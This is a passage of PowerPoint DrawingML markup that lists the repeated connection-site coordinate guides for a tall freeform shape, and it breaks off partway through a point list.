              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385283 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385283 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385283 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
